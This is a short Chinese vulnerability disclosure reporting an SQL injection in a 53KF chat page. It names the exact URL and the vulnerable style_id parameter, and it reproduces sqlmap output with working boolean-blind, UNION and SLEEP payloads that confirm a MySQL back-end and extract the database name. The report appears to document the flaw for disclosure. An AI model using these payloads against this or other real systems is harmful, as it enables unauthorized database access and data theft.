53KF某处一个注入点

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 某处的一个注入 ### 详细说明: 存在注入的地址: ``` http://www10.53kf.com/zdy_dbgg2.php?style_id=106098168&company_id=72067196&dbgg_type=2 ``` ``` sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: style_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: style_id=106098168 AND 2074=2074&company_id=72067196&dbgg_type=2 Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: style_id=106098168 UNION ALL SELECT NULL,NULL,CONCAT(0x716d617171,0x4a4f52497265634c4342,0x716a617271),NULL,NULL,NULL,NULL,NULL,NULL#&company_id=72067196&dbgg_type=2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: style_id=106098168 AND SLEEP(5)&company_id=72067196&dbgg_type=2 --- [21:51:47] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.11 [21:51:47] [INFO] fetching current database current database: 'talk' [21:51:48] [INFO] fetched data logged to text files...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息